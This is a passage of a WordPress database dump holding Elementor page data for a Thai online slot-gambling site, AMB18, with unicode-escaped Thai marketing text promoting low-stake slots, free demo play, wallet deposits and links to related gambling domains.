\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3192,417,'_thumbnail_id','371'),(3193,417,'_elementor_edit_mode','builder'),(3194,417,'_elementor_template_type','wp-page'),(3195,417,'_elementor_version','3.35.5'),(3196,417,'_elementor_pro_version','3.32.3'),(3197,417,'_wp_page_template','default'),(3198,417,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3199,417,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 